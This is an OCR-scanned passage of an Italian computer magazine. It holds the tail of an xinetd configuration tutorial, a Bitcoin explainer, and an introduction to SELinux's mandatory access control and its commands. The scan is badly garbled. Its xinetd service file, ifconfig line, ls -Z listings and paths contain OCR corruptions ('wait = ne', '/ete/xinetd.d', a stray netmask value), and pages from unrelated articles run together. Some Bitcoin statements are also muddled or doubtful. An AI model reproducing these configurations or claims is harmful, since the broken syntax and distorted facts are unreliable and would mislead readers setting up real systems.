warning, notice, info e debug. Ma i log possono essere registrati 
anche su file nel qual caso la sintassi vedrà FILE nome_file ed 
eventualmente i parametri opzionali soft_limit e hard_limit ad 
indicare la dimensione massima del file che dovrà registrare gli 
eventi. 

Con la terza entry, log_on_success verranno registrati gli eventi 
in caso di esito positivo della richiesta: oltre agli ovvi HOST, 
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NM Fig. 4 * La terza connessione era al di fuori 
dell'orario consentito! 


PID, TRAFFIC e USERID troviamo DURATION che indi- 
ca la durata della sessione, EXIT che riporta il motivo della 
terminazione della istanza. Segue la direttiva log_on_failure 
che registra le connessioni fallite: la lista può contenere i valori 
HOST, USERID e ATTEMPT ad indicare un tentativo fallito. 
L'ultima entry, cps "connessioni per secondo", è intesa come la 
frequenza massima di accesso: il primo numero indica il limite 
sulle connessioni al secondo seguito da un altro valore intero 
che indica quanti secondi attendere prima di accettare una nuo- 
va richiesta allorquando venga superato il limite di connessioni 
al secondo. 

Nel file in figura si possono avere al massimo 25 connessioni 
al secondo: in caso di superamento per i successivi 30 secondi 


Xinetd rifiuterà tutte le richieste. 


ESEMPIO DI APPLICAZIONE 


Vista l'elevato campo di applicazioni non sarà possibile elencare 
le varie situazioni e allora limitiamoci ad un esempio pratico 
utilizzando il servizio netstat (man netstat) che viene utilizzato 
per visualizzare lo stato delle connessioni instaurate. Creiamo 
un servizio netstat scrivendo ad-hoc da zero il file di nome, ad 
esempio, netstat con le seguenti righe: 


service netstat 


{ 
socket _type = stream 
wait = ne 
user = root 
server = /bin/netstat 


server args = -ant 
192.168.11.23 


11:00-12:00 


only from - 


access time = 


Salviamo il file in /ete/xinetd.d e riavviamo Xinetd. Poiché non 
possiamo pretendere che ogni lettore abbia almeno due compu- 
ter per le prove allora creiamo una interfaccia di rete virtuale 
utilizzando il comando (da amministratore): 


ifconfig eth0:0 inet 192.168.11.23 netmask 31 
255.255 ,255.0 


L'interfaccia di rete virtuale avrà l'indirizzo 192.168.11.23 che 
potremo cambiare a nostro piacimento. A questo punto con tel- 
net proviamo a collegarci dapprima con localhost poi con l'indi- 
rizzo associato all'interfaccia di rete virtuale 

Nel primo caso non ci verrà restituito nulla (a causa della diret- 
tiva only_from) mentre nel secondo caso otterremo la risposta 
se e solo se rientriamo nell'orario riportato dalla direttiva ac- 
cess_times. Nell’output (Figura 4) si può notare da notare la 
presenza dello stato LISTEN sul protocollo TCP sulla porta 15 
esattamente come riportato nel file /ete/services per netstat. 
Possiamo limitare anche le richieste telnet creando un altro file 
ad-hoc per questo compito così come possiamo immaginare di 
fare configurazioni puntuali per servizi come SSH, FTP e Sam- 
ba nella nostra LAN qualunque sia la sua complessità! 
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uando nel XIX secolo ebbe inizio la corsa all‘oro, mi- 

gliaia di individui abbandonarono il proprio lavoro e 

la vita di tutti i giorni alla ricerca della ricchezza. Il 
successo non era garantito, ma la prospettiva di guadagnare ra- 
pidamente era fin troppo allettante. L‘attuale corsa all‘oro 2.0, 
si presenta molto meno spettacolare, poiché i picconi di allora 
sono stati sostituiti da computer che creano ricchezza 24 ore su 
24. Questo “materiale” così desiderato si presenta solo in for- 
mato digitale e porta il nome di “Bitcoin”. Nel XXI secolo solo 
un ristretto gruppo di pionieri della rete ha mantenuto viva per 
anni l'atmosfera dei cercatori d‘oro. Negli ultimi mesi, però, il 
valore, e di conseguenza l‘importanza di questa moneta, è au- 
mentato rapidamente fino a raggiungere la quotazione di 1000 
Euro per un Bitcoin. Gli istituti bancari e tutti i paesi del mondo 
riconoscono ora questa valuta virtuale, anche se con pareri mol- 
to diversi. Nascerà da qui, la valuta globale del futuro? 


PREGO, UN BITCOIN 


Le chances per la creazione di una nuova moneta sono intima- 
mente legate alle carenze delle attuali forme di pagamento. An- 


CHE COS'È UN “SATOSHI”? 


Chi esegue transazioni commerciali o acquisti 
con Bitcoin, non è obbligato a lasciare sempre 
sul tavolo virtuale un Bitcoin intero (1 BTC): sono 
accettate anche frazioni della moneta. L'unità di valore più 
basso, fissata al momento per motivi tecnici, presenta il valore 
di 0,00000001 BTC. In base al cambio attuale equivale a un 
millesimo di cent. In onore dell' ideatore della moneta digitale, 
la frazione più piccola del Bitcoin si chiama “Satoshi”. 
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TUTTO QUELLO 
CHE DOVETE 
SAPERE SUI BITCOIN 


Da alcuni mesi il valore della criptomoneta più nota, i Bitcoin, 
si è portato a livelli elevatissimi diventando di colpo un tema 
scottante. Cosa si nasconde dietro questa MONETA VIRTUALE? 


che valute forti come l'euro e il dollaro presentano dei punti 
deboli. Da un lato sono legate solidalmente al sistema bancario: 
infatti sono proprio le banche centrali a stabilire quanta carta 
moneta debba essere stampata, influenzando direttamente il va- 
lore della divisa attraverso l‘inflazione. Dall‘altro lato, chiun- 
que effettui degli acquisti o eserciti un attività commerciale, è 
tenuto al pagamento di imposte. E infine occorre non dimenti- 
care che nello svolgimento delle operazioni finanziarie tradizio- 
nali è quasi impossibile rimanere anonimi. Il Bitcoin dovrebbe 
risolvere questi problemi. Anziché una banca centrale statale, 
abbiamo è una rete decentrata di computer che si occupa del- 
la distribuzione del denaro. L'operazione non è tuttavia così 
semplice: su ognuno dei computer in rete lavora un software 
speciale che crea automaticamente degli algoritmi, che i com- 
puter devono cercano di risolvere (vedi grafico a destra). Come 
ricompensa per la risoluzione di queste operazioni di calcolo, il 
sistema sforna i Bitcoin. Gli algoritmi tendono a diventare sem- 
pre più complessi e, se nel 2009 produrre un Bitcoin era relati- 
vamente veloce, oggi un notebook tradizionale necessiterebbe 
di molti anni, per risolvere i calcoli che danno origine a queste 
“monete d‘oro” digitali. Solo i consumi energetici sarebbero di 
gran lunga più elevati rispetto all‘utile derivato dai Bitcoin. Nel 
frattempo, numerosi pool di server dotati di potenti processori, 
non fanno altro che calcolare le infinite sequenze di numeri. 
Per i sistemi raggruppati in pool si tratta di un'operazione che 
richiede un quantitativo di energia estremamente elevato, del 
tutto simile alla frantumazione dei detriti del sottosuolo durante 
la corsa dell‘oro. Il processo estrattivo da questa miniera d‘oro 
virtuale viene chiamato giustamente “Bitcoin Mining”. I com- 
puter competono in questa operazione con la loro potenza di 
calcolo, per cercare di essere i primi a risolvere le operazioni 
matematiche che assegnano i Bitcoin. Il sistema provvede a ge- 
nerare nuovi algoritmi ogni dieci minuti. Questo processo non 
potrà però durare in eterno: è stato matematicamente accertato 
che potranno esistere 21 milioni di Bitcoin al massimo e quindi 


sulla base di valutazioni eseguite, è previsto il crollo di questa 
moneta per il 2030. 


SCAMBI DIGITALI 


Quando si creano Bitcoin, si accantonano nel proprio portafo- 
glio virtuale. Il sistema Bitcoin rilascia contemporaneamente 
una “Blockchain”: una specie di ricevuta di estrazione, acces- 
sibile pubblicamente. In questo modo si impedisce, tra l‘altro, 
che i Bitcoin, una volta generati, non possano essere duplicati 
con facilità. L'operazione viene resa pubblica a tutti in una ban- 
ca dati, ma non l‘identità del ricevente: chi lo desidera, potrà 
celarsi permanentemente nel mondo dei Bitcoin dietro ad uno 
pseudonimo. Dato che il semplice possesso dei Bitcoin non pro- 
duce niente, questa moneta digitale ha la possibilità di scoprire 
i propri muscoli soprattutto negli scambi. Chi desidera pagare 
con Bitcoin offerte, merci o servizi, potrà riuscirvi senza ricor- 
rere a banche e intermediari. Se Internet venisse contemplata 
come uno stato a sé stante, i Bitcoin potrebbero essere conside- 
rati come la moneta ufficiale di questo stato. Numerosi servizi 
online accettano già pagamenti a mezzo Bitcoin, al posto dei 
comuni dollari e euro. Per il consumatore, procurarsi Bitcoin 
è certamente più difficoltoso che non estrarre oro in Alaska. In 
Internet esistono pertanto delle agenzie di cambio virtuali, che 
scambiano anche euro contro Bitcoin. Ad esempio il 9 Dicem- 
bre l'agenzia www.bitcoin.de, scambiava 1 Bitcoin contro 649,81 
Euro. Un’oncia di oro costa poco di più. Essendo possibile ef- 
fettuare pagamenti con Bitcoin in modo anonimo, superando 
qualsiasi confine geografico e senza intervento di banche, que- 
sta moneta virtuale diventa ideale anche per operazioni illegali. 
In questo modo, ha funzionato “Silk Road”, uno dei più grandi 
mercati Internet della droga, fino alla sua chiusura nell‘Ottobre 
2013, smerciando circa 1‘1,5 % di tutte le sostanze stupefacenti 
in circolazione: furono confiscati quasi 140.000 Bitcoin. 


IL DIZIONARIO DEI BITCOIN 


Block ChaiN - La blockchain è un registro pubblico di tutte le 
transazioni Bitcoin, ordinato cronologicamente. È condivisa tra 
tutti gli utenti Bitcoin ed è impiegata per verificare il saldo degli 
indirizzi Bitcoin, nonché per impedire che le stesse monete 
vengano spese più volte. 

Blocco - Un blocco è una parte della blockchain che contiene e 
conferma molte transazioni in attesa. In media, ogni 10 minuti 
circa un nuovo blocco, che include delle transazioni, viene ag- 
giunto alla blockchain attraverso il processo di mining. 

Hash rete - È l'unità di misura della potenza di elaborazione 
della rete Bitcoin. Per fini di sicurezza la rete Bitcoin deve 
eseguire delle operazioni matematiche intensive. Quando la rete 
raggiunge un hash rate di 10 TH/s, significa che può realizzare 
untrilione di calcoli al secondo. 

Mining - Per mining si intende il processo che fa eseguire 
all'hardware del computer calcoli matematici al fine di confer- 
mare le transazioni e aumentare la sicurezza della rete Bitcoin. 
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MA | BITCOIN SONO SICURI? 


Quando si tratta di operazioni in denaro, che possono essere 
concluse via Internet, anche i criminali che vogliono arricchirsi 
fanno la loro parte. Nell‘universo dei Bitcoin, le banche non 
vengono contemplate come un punto debole, dato che le loro 
misure per la sicurezza sono in grado di minacciare “Wallet”, il 
portafoglio digitale dove vengono depositati i Bitcoin. Chi vuo- 
le salvaguardarsi da violazioni dovrebbe quindi dotare il proprio 
Wallet di una protezione, per esempio facendo uso di un hard 
disk esterno o di un computer, non connesso ad Internet. Ogni 
utente rimane però inerme contro un eventuale pericolo: il suc- 
cesso dei Bitcoin si basa sull‘infallibilità del sistema di calcolo 
e sulle piattaforme commerciali. Secondo Kaspersky, azienda 
specializzata in sistemi per la sicurezza, solo nel 2012 sono stati 
commessi più di 100.000 furti di Bitcoin. Nel Novembre 2013, 
BIPS, trading center danese per Bitcoin, ha registrato attacchi 
ai server Bitcoin per un valore di oltre un milione di dollari 


Luglio2010 


® Febbraio/Marzo 2014 


che, secondo le dichiarazioni del direttore Kris Henriksen, sono 
stati sottratti senza alcuna possibilità di recupero. Se i cyber- 
criminali riuscissero a infiltrarsi in una delle piazze mondiali 
per gli scambi, la moneta digitale verrebbe messa di colpo in 
serio pericolo. 


SI MIRA AL FUTURO 


I Bitcoin saranno la vera grande innovazione del futuro? I van- 
taggi sono evidenti, ma il complesso funzionamento del sistema 
e i pericoli di attacchi criminali, fanno astenere la maggior parte 
degli individui dal depositare in futuro i loro risparmi in questi 
portafogli virtuali. A prescindere da questo, nessuno naturalmen- 
te può predire adesso se il valore dei Bitcoin tenderà a salire 
anche in futuro o se questa corsa all‘oro digitale si rivelerà come 
un‘altra bolla di Internet, che un domani potrebbe scoppiare, una 
cosa è certa: la piattaforma è tra le più interessanti mai apparse. 


16-8-2013 


fine novembre 2013 


Pagina mancante 
(pubblicità) 


a maggior parte delle informazioni aziendali sono oggi 

immagazzinate nei sistemi elettronici e il mondo digitale 

pone nuove sfide per la loro protezione. È vero che tutti i 

sistemi operativi dispongono di forme di gestione dei per- 
messi di accesso a file e directory, ma in certi ambiti tali sistemi pos- 
sono non essere sufficienti: per risolvere questo problema, la NSA ha 
creato SELinux, che introduce nel kernel Linux un meccanismo di 
controllo degli accessi molto più raffinato. Attualmente il sistema è 
adottato dalla maggior parte delle distribuzioni, ma per le nostre pro- 
ve abbiamo utilizzato le ultime versioni di Fedora e CentOS, dove 
SELinux è già installato e attivo di default. 


IL CONTROLLO DEGLI ACCESSI 
IN LINUX 


Per comprendere meglio la flessibilità e le potenzialità di SELinux, è 
necessario innanzitutto richiamare alcuni concetti sulla tradizionale 
modalità di gestione dei permessi adottata da Linux. 

Essendo un sistema UNIX-like, fin dalle sue origini sicurezza e con- 
trollo degli accessi alle informazioni sono stati sempre argomenti 
di fondamentale importanza. Il meccanismo di protezione alla base 
di Linux è di tipo DAC (Discretional Access Control): gli utenti di 
sistema sono proprietari di oggetti (directory e file), ogni utente può 
accedere ai propri file e ciascun proprietario può inoltre concedere a 
terze parti i privilegi di accesso ai propri oggetti. Gli utenti di sistema 
vengono identificati univocamente attraverso un UID (User ID), un 
intero di 32 bit. L’ID 0 è riservato e assegnato dall’utente root. Du- 
rante la creazione, l'oggetto — ad esempio un file — viene marcato con 
ID del soggetto che l’ha creato, ovvero il proprietario. 

Gli utenti inoltre possono essere organizzati in gruppi. Ciascun grup- 
po viene identificato con un intero a 32 bit denominato GID (Group 
ID) e ogni utente può essere assegnato a uno o più gruppi. Per ogni 
file o directory è possibile specificare il tipo di accesso consentito al 
proprietario, agli utenti appartenenti a uno specifico gruppo ed a tutti 
gli altri utenti. Il tipo di accesso può essere in lettura (r), in scrittura 


SICUREZZA 


ASSOLUTA 
CON SE LINUX 


Security-Enhanced Linux offre una maggiore sicurezza 
per il nostro sistema e permette di assegnare ruoli 
specifici agli utenti, per evitare che accedano a file 0 a 
processi non di loro competenza 
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(w) e in esecuzione o attraversamento in caso di directory (x). Di 
default, il gruppo assegnato al file coincide con il primary group del 
proprietario dell'oggetto, ma è possibile modificarlo attraverso i co- 
mandi chown o chgrp. Il comando seguente 


# chgrp users file.txt 


assegna il gruppo users al file di testo. 

L'elenco dei permessi concessi alle tre famiglie di utenti su ciascun 
file può essere ottenuto attraverso il comando Is. Nell’elenco visua- 
lizzato è possibile determinare, tra le altre cose, anche il nome e i 
permessi di ciascun oggetto, l’utente proprietario e il nome del grup- 
po. Attraverso il comando chmod, invece, è possibile assegnare i per- 
messi. Ad esempio il comando 


$ chmod u=rw,g=rw,0=r file.txt 


assegna i privilegi di lettura e scrittura all’utente proprietario (u) e 
agli utenti del gruppo (g), mentre agli altri utenti (0) assegna solo 
l’accesso in lettura. Per un approfondimento vi rimandiamo alla pa- 
gina di manuale del comando. 


IL CONTROLLO DEGLI ACCESSI 
VINCOLATO 


Il modello DAC presenta non pochi limiti: innanzitutto offre solo due dif- 
ferenti categorie di utenti, ovvero administrator e non administrator; i 
file di proprietà di un utente sono accessibili non solo all’utente stesso, 
ma anche a tutti i programmi che vengono eseguiti con i suoi permessi, 
rendendo di fatto possibile l’accesso alle informazioni sensibili da parte di 
codice malevolo eseguito inconsapevolmente dall’utente: infine un utente 
autorizzato alla lettura di un file può passarne una copia ad un altro che 
non sia autorizzato. 

Inoltre, se il bit SETUID di un programma eseguibile è abilitato, attra- 
verso la chiamata di sistema setuid() è possibile valorizzare l'UID del 


processo con l'ID del proprietario del file eseguibile anziché con quello 
dell’utente che ha lanciato il programma. Questo è tipicamente quello che 
succede, ad esempio, con il comando passwd che esegue il processo asse- 
gnandogli ID di root in modo da ottenere il permesso di scrittura nei file 
lete/passwd e /etc/shadow. 

Il Mandatory Access Control (MAC), ovvero il Controllo degli Accessi 
Vincolato, si basa sull’utilizzo di etichette di sicurezza che riflettono la 
sensibilità delle informazioni. L'Orange Book, il noto documento dalla 
copertina arancione della difesa degli Stati Uniti, definisce il MAC come 
“a means of restricting access to objects based on the sensitivity (as re- 
presented by a label) of the information contained in the objects and the 
formal authorization (i.e., clearance) of subjects to access information of 
such sensitivity” ovvero “uno strumento per limitare l’accesso agli oggetti 
in base sia alla sensibilità (rappresentata da una etichetta) delle informa- 
zioni in essi contenute, sia in base alla autorizzazione formale dei soggetti 
per l’accesso a tali informazioni”. 

In un sistema basato su MAC, come è SELinux, a ciascun soggetto (pro- 
cesso) e oggetto (file, device, socket, porte) è possibile associare un'eti- 
chetta di sicurezza: quando un soggetto tenta di accedere ad un oggetto, il 
kernel consente o nega l’accesso del processo all'oggetto non solo in base 
all’identità dell’utente che ha eseguito il processo, ma anche in base alle 
politiche di sicurezza associate al soggetto e all'oggetto. 


@ Fig. 1 » Discretionary Access Control versus Mandatory Access 
Control: in DAC, un attaccante che sfrutta una falla del sistema e 
accede a un componente privilegiato può compromettere l'intero 
sistema 


Oltre al MAC, SELinux implementa un Role Based Access Control 
(RBAC): questo significa che è possibile creare dei ruoli che permetto- 
no di ottenere una suddivisione degli utenti che vada oltre la tradizionale 
classificazione che prevede la presenza di solo due tipologie di utenti (or- 
dinari e amministratori). Un utente infatti può essere autorizzato ad agire 
in certi ruoli e a ciascun ruolo viene assegnato (attraverso i domini) un 
insieme di permessi: in questo modo, rispettando il principio dei privilegi 
minimi (“ad ogni soggetto dovrebbero essere garantiti i soli privilegi mi- 
nimi necessari a completare il proprio compito”), è possibile arginare il 
danno potenziale che può derivare dallo sfruttamento di una vulnerabilità 
dell'applicazione, impedire l’accesso alle informazioni da parte di utenti 
con limitate autorizzazioni e proteggersi da applicazioni maligne eseguite 
inconsapevolmente da utenti autorizzati. 


UN ESEMPIO PER CHIARIRE 
LA SITUAZIONE 


Immaginiamo che un amministratore poco scrupoloso abbia deciso, per 


qualche motivo, di modificare le direttive User e Group del file di confi- 
gurazione di Apache, in modo da avviare il demone con i privilegi di root. 
In questo scenario, qualsiasi script PHP, essendo eseguito con i privilegi di 
root, potrebbe accedere in lettura a qualsiasi file presente sul sistema, ad 
esempio /ete/passwd e /ete/shadow. L'utilizzo di un sistema MAC/RBAC 
opportunamente configurato eliminerebbe la possibilità di accedere a quei 
file (marcati come “accessibili solo da chi può cambiare le password”, ad 
esempio) da parte del webserver o un suo processo figlio, nonostante i 
privilegi di root. 

Come abbiamo visto, anche di fronte ad un plateale errore di configurazio- 
ne, un sistema MAC/RBAC incrementa la sicurezza del sistema. Ora non 
resta che mettere mano a SELinux! 


SELINUX 


Le origini di SELinux, acronimo di Security Enhanced Linux, risalgono 
agli inizi degli anni 90, quando i più grandi esperti dell’NSA (National 
Security Agency) in collaborazione con Secure Computing Corporation 
progettarono e svilupparono un sistema di controllo flessibile e robusto 
che successivamente, grazie alla collaborazione dell’ University of Utah, 
venne implementato nel sistema operativo Fluke, prendendo il nome 
FLASK. Successivamente, NSA.e MITRE Corporation, implementarono 
l'architettura all’interno del sistema operativo Linux dando vita, alla fine 
del 2000, al noto sistema SELinux. 


® Fig. 2 * L'architettura di SELinux 


Una nota doverosa: SELinux non è un'alternativa alle buone pratiche 
di sicurezza, come aggiornare il software, usare password forti e pro- 
teggere i sistemi con firewall dove necessario. 

SELinux utilizza il modello MAC/RBAC, permettendo di specificare un 
Security Context per utenti, processi, file e directory, compresi i device e 
le porte di rete. È possibile controllare i contesti SELinux usando l'opzione 
-Z.in ls, ps e comandi simili, ad esempio: 


# ls HZ 
-LrWw------- . root root system u:object_r:admin_) 
home_t:8s0 anaconda-ks.cfg 
-TW-T--r--. root root system_u:object_r:admin_1 
home_t:s0 install.log 
-rW-r--r--. root root system u:object_r:admin_3 


home_t:s0 install.log.syslog 


Per ora, ci basti osservare che ai processi vengono associati un utente SE- 
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Linux (es. umconfined_u, system_u), un ruolo (unconfined_r, system_r) e 
un dominio (getty_t, sshd_t, unconfined_t) e ai file un utente (system_u), 
un ruolo (object_r) e un tipo (admin _home_t). Non tratteremo il livello 
(s0 peri file, s0-s0 peri processi) e la classe (c0.c1023 indica “tutte le clas- 
si da c0 a c1023”), dato che al momento della stesura non sono utilizzate 
dalle policy di default su nessuna distribuzione. 

La verifica della validità di un'operazione viene eseguita, a valle dei 
normali controlli DAC del sistema, da due componenti che fanno parte 
dell’architettura di SELinux: Policy Enforcement Server, che applica la 
politica di controllo degli accessi, ed il Security Server, che prende le de- 
cisioni di sicurezza in base ad una specifica policy, ovvero un insieme di 
regole che guidano SELinux. In questo modo viene garantita la separa- 
zione tra la logica di decisione e la logica di realizzazione. 

Quando un soggetto desidera eseguire un'operazione su un oggetto (come 
può essere l'apertura di un file) la sua richiesta è intercettata dal Linux 
Security Module (LSM) e successivamente inoltrata, assieme ai Security 
Context del soggetto e dell'oggetto, al sottosistema SELinux Abstraction 
& Hook Logic che rappresenta l'interfaccia di LSM con il Policy Enfor- 
cement Server. Quest'ultimo riceve i Security Context del soggetto che 
intende eseguire un'operazione e dell'oggetto sul quale dev'essere eseguita, 
quindi verifica se le decisioni relative sono presenti nell'Access Vector Ca- 
che (AVC); in caso contrario, la richiesta è inoltrata al Security Server che 
prende le decisioni di sicurezza in base agli attributi del Security Context 
del soggetto e dell'oggetto. Il Security Server quindi accede al Security 
Policy Database, un repository nel quale le policy sono compilate in for- 
mato binario, quindi restituisce un vettore di accesso, che specifica quali 
modalità di accesso a quella specifica classe di oggetti sono consentite per 
quel determinato soggetto. Tale vettore di accesso, che riprenderemo nel 
seguito, viene memorizzato nell’ AVC, in modo che eventuali ulteriori ac- 
cessi siano più rapidi. Se la policy permette al soggetto di eseguire l’ope- 
razione, questa viene autorizzata, altrimenti viene rifiutata ed il relativo 
messaggio di log viene registrato nel file di audit, in modo da permette 
all’amministratore un eventuale analisi delle operazioni negate. 


IL TYPE ENFORCEMENT DI SELINUX 


Per capire meglio il funzionamento di SELinux dobbiamo esaminare 
come funziona il Security Server. Questo si basa su tre paradigmi di sicu- 
rezza: Identity-based Access Control (IBAC), Role-based Access Control 
(RBAC) e Type Enforcement (TE), che riflettono il formato del Security 
Context. Ciascun elemento della terna che compone il Security Context, 
infatti, viene utilizzato allo scopo di determinare una decisione e la com- 
binazione dei tre modelli offre potenti strumenti per la definizione di com- 
plesse politiche di sicurezza. 

Il Type Enforcement si occupa di associare un Security Attribute “Do- 
main” ad ogni processo ed un “Type” a ogni oggetto. Un processo di 
dominio D può accedere a un oggetto di tipo T solo se è stata definita 
una regola di sicurezza che autorizza il dominio D ad accedere al tipo T 
dell’oggetto. In caso contrario, la richiesta verrà negata. Domain e Type 
possono pertanto essere visti come classi di equivalenza: tutti i processi 
appartenenti ad un medesimo dominio 0, analogamente, tutti i file aventi il 
medesimo tipo, vengono trattati in maniera identica. 

In pratica, SELinux utilizza un singolo Security Attribute sia per i processi 
che per gli oggetti; un dominio pertanto può essere inteso come un Type 
e associato indifferentemente a oggetti e soggetti, cosa che permette di 
definire una sola matrice degli accessi (sia per i tipi che per i domini). 
Nonostante ciò, il termine dominio è tuttavia mantenuto per convenienza. 
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entos 


[centosglocalhost /]}S ls -12 
d . root root system u:object r:bin t:s0 bin 
. root root system u:object r:boot t:s0 boot 
. root root system u:object r:cgroup t:50 cgroup 
«x. root root system u:object r:device t:50 dev 
. root root system u:object r:etc t:50 eto 
. root root system u:o0bject r:home root t:58 home 
-x. root root system u:object r:lib t:s0 lib 
--. root root system u:object r:lost found t:50 lost+found 
-X. root root system u:object r:mnt t:s8 i 
. root root system u:object r:autofs t:s0 
. root root system u:object r:mnt t:s0 
*x. root root system u:object r:autofs t:s9 
. root root system u:object r:usr t:50 
-x. root root system u:object r:proc t:s0 
-. root root system u:object r:admin home t:50 root 
. root root system u:object r:bin t:50 sbin 
-x, root root system u:object r:security t:50 selinux 
. root root system u:object r:var t:s0 srv 
. root root system u:object r:sysfs t:50 sys 
. root root system u:object r:tmp t:s0 ti 
. root root system u:object r:usr t:s0 usr 
-x. root root system u:object r:var t:s0 var 
[centos@localhost /]$ E 


® Fig. 3 * Tipi, domini e utenti degli oggetti contenuti della home 
directory dell'utente 


In ogni istante, ogni processo può appartenere a un solo dominio e ogni 
oggetto può essere di un solo tipo. Il TE adotta un comportamento prede- 
finito: i processi ereditano lo stesso dominio dell’utente che li ha avviati; 
gli oggetti, invece, ereditano il tipo del related object (ad esempio la parent 
directory). Durante l’esecuzione un processo può transitare da un dominio 
a un altro, allo scopo di limitarne o ampliarne i privilegi, se autorizzato da 
una specifica regola. 

Oltre ad avere un tipo, gli oggetti possono essere raggruppati in classi, in 
modo da poter trattare in modalità differente gli oggetti che, pur avendo lo 
stesso tipo, appartengono a classi differenti. Classi molto utilizzate sono 
“file” e “dir” che rappresentano rispettivamente i file e le directory, ma è 
possibile classificare gli oggetti in maniera più fine, a d esempio distin- 
guendo i socket TCP dai socket UDP. Una classe può contenere oggetti di 
tipi differenti e un tipo può essere presente in differenti classi. A ciascuna 
classe di oggetti sono associati differenti permessi. Ad esempio read, wri- 
te, create e lock sono alcuni permessi che possono essere assegnati su un 
oggetto di classe file. Vedremo più avanti un elenco esaustivo dei permessi 
delle classi dir e file. L'insieme dei permessi che definiscono le modalità 
di accesso ad un oggetto da parte di un processo prende il nome di vettore 
di accesso che, come anticipato nel precedente paragrafo, rappresenta la 
struttura dati restituita dal Security Server e memorizzata nell’ AVC. Spes- 
so l'elenco dei permessi associati a una classe potrebbe essere piuttosto 
nutrito, per questo motivo sono state definite delle macro che permettono 
di riunire in gruppi insiemi di permessi di una classe che comunemente 
devono essere garantiti o negati in gruppo. 

Senza alcuna pretesa di completezza (riprenderemo l’argomento nei pros- 
simi paragrafi) mostriamo di seguito una regola di sicurezza: 


allow httpd_t etc_t:file { read getattr ioctl }; 


In questo esempio i processi appartenenti al dominio httpd_t vengono 
autorizzati ad accedere agli oggetti di classe file e tipo etc_t, nel rispetto 
dei permessi indicati tra la coppia di parentesi graffe. 

Attraverso una lista di regole, denominata Security Policy e memorizzata 
nella matrice degli accessi, è possibile specificare come i domini possono 
accedere ai tipi, come i domini possono interagire con gli altri domini e 
quali sono gli utenti autorizzati ad operare in certi domini. È importante 
ricordare che le policy di SELinux non vengono verificate se le regole 
DAC negano l'accesso. 


centos@localhost 


[centos@localhost /]$ sestatus 
SELinux status: 
SELinuxfs mount: 


enabled 
/selinux 
enforcing 
enforcing 


Current mode: 

ode from config file: 
Policy version: 

Policy from config file: 
[centos@localhost /1$ J 


® Fig. 4 * l'output del comando sestatus mostra lo stato attuale di 
SELinux 


Affinché SELinux possa impedire l'esecuzione delle azioni non autoriz- 
zate, è necessario che venga eseguito in modalità enforcing: in tale modo, 
TE impedirà qualsiasi operazione se non esiste una regola esplicita di al- 
low che la consenta; inoltre, nessuna regola autorizzata viene registrata 
nel file di audit, a meno che non esista una regola di auditallow che lo 
consenta, mentre tutte quelle bloccate vengono registrate, a meno che non 
esista una regola dontaudit che lo vieti. 

È possibile far girare SELinux anche in modalità permissive, che non 
blocca alcuna operazione, ma salva i relativi messaggi di warning nel file 
di audit, permettendo una successiva analisi delle operazioni. 
Utilizzando il comando sestatus è possibile conoscere una serie di infor- 
mazioni sullo stato del sistema: 


$ sestatus 


SELinux status: enabled 
SELinuxfs mount: /selinux 
Current mode: enforcing 
Mode from config file: enforcing 
Policy version: 24 

Policy from config file: targeted 


in particolare, il comando mostra la modalità di esecuzione di SELinux 
(enforcing, permissive o disabled) e la policy utilizzata (targeted). La 
modifica della modalità di esecuzione avviene tramite il comando seten- 
force, passando come parametro la modalità da impostare: 


$ setenforce enforcing 


Le modifiche effettuate tramite il comando setenforce, però, non sono 
persistenti, di conseguenza al successivo riavvio della macchina verranno 
ripristinate. Per rendere permanente la modifica, è necessario modificare 
il file di configurazione /etc/selinux/config che, attraverso le direttive SE- 
LINUX e SELINUXTYPE, permette di specificare la modalità di esecu- 
zione e la policy da usare. 


IL ROLE-BASED ACCESS CONTROL 
DI SELINUX 


Utenti e Domini di SELinux non sono collegati direttamente. Il Role- 
based Access Control, infatti, aggiunge un livello di astrazione tra utenti 
e domini, rendendo il ruolo come un intermediario tra gli utenti SELinux 
ei domini. 

Sebbene il concetto di ruolo sia significativo solo peri soggetti, è possibile 
assegnare un ruolo anche agli oggetti, ma questo non verrà preso in consi- 


derazione: tipicamente, agli oggetti è assegnato il generico ruolo object_r. 
Tipici ruoli sono user_r, per gli utenti ordinari, sysdm_r, per gli ammini- 
stratori di sistema, system_r per i processi di sistema e unconfined_r che 
rappresenta il ruolo di default per gli utenti interattivi su RHEL/CentOS 
e Fedora. Ogni ruolo è autorizzato per un corrispondente dominio. Ad 
esempio, il ruolo user_r è autorizzato per il dominio user_t, mentre il 
ruolo sysadm_r è autorizzato per il dominio sysadm_t. Attraverso le po- 
licy è possibile specificare quali sono gli utenti autorizzati ad agire in certi 
ruoli e quali sono i ruoli che possono accedere ad un insieme di domini. In 
pratica un utente può accedere ad un oggetto solo se agisce in un ruolo au- 
torizzato ad accedere a quell’oggetto. Il ruolo di un utente viene impostato 
al login, ad esempio appena loggati da root possiamo verificare il contesto 
associato all'utente con id: 


# id <Z 
unconfined_u:unconfined_r:unconfined_t:50-50:c0.c1023 


IDENTITY-BASED ACCESS CONTROL 


Come abbiamo già sottolineato nei paragrafi precedenti, una delle princi- 
pali vulnerabilità dei tradizionali sistemi di sicurezza è causata dalla pos- 
sibilità di cambiare l'identità dell'utente, attraverso le chiamate di sistema 
setuid. Per impedire l'alterazione dell’identità dell’utente, IBAC permette 
di definire identità in modo da separarle da quelle di sistema. L’identi- 
tà di sistema infatti viene mappata, attraverso le policy, nella corrispon- 
dente identità SELinux dal modulo pam_selinux al momento del login 
dell’utente. Di default, su RHEL ad ogni utente Linux creato con il co- 
mando useradd viene associata l’identità unconfined_u. Sono comunque 
disponibili altri utenti SELinux ai quali l’utente di sistema può essere as- 
sociato. L'utente Linux associato a una identità eredita i permessi concessi 
all'identità. L'identità SELinux viene quindi utilizzata per limitare i ruoli 
che ogni utente può assumere. Analogamente ai domini ed ai tipi, anche 
l'informazione sull’identità dell’utente viene mantenuta nel corrisponden- 
te attributo di sicurezza del Security Context. 


LAVORARE CON SELINUX 
DALLA LINEA DI COMANDO 


Il Security Context di un oggetto può essere modificato usando il coman- 
do chcon con le opzioni -t (type, domain), -r (role) e -u (user, identità). 
Ad esempio: 


$ chcon -t samba_share_t /home/centos/file.txt 
$ chcon -r object_r /home/centos/file.txt 
$ chcon -u user_u /home/centos/file.txt 


Per conoscere il contesto associato a un file, invece, possiamo utilizzare 
il comando ls: 


# ls -1Z /home/centos/file.txt 
-rw-r--r--. 2 user_u:object_r:samba_share_t:s03 


centos centos file.txt 


L'associazione tra utente di sistema e identità SELinux può essere effet- 
tuata attraverso il comando semanage. Ad esempio il comando: 


